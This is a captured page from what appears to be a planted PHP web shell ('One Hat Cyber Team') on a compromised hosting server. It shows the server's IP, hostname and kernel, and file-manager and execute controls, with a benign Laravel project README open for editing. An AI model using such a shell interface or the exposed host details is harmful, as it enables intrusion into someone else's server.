⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.229
Server IP:
95.217.99.93
Server:
Linux sv1.sonichosted.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lifestylescentra
/
www
/
Edit File: README.md
## Installation Process - Clone this repo `git clone git@github.com:websolutionus/wsus_laravel_global_setup.git` - Change Directory to `cd wsus_laravel_global_setup` - Create a database in your database server - Copy the .env.example file Windows: `copy .env.example .env` Linux: `cp .env.example .env` - Open .env file and add database information previously created on step-3 - Install Packeges `composer install` - Generate key `php artisan key:generate` - Install Node Modules `npm install`, `npm run build` - Migrate Database `php artisan migrate` - Run Server `php artisan serve` - Browse http://localhost:8000
Simpan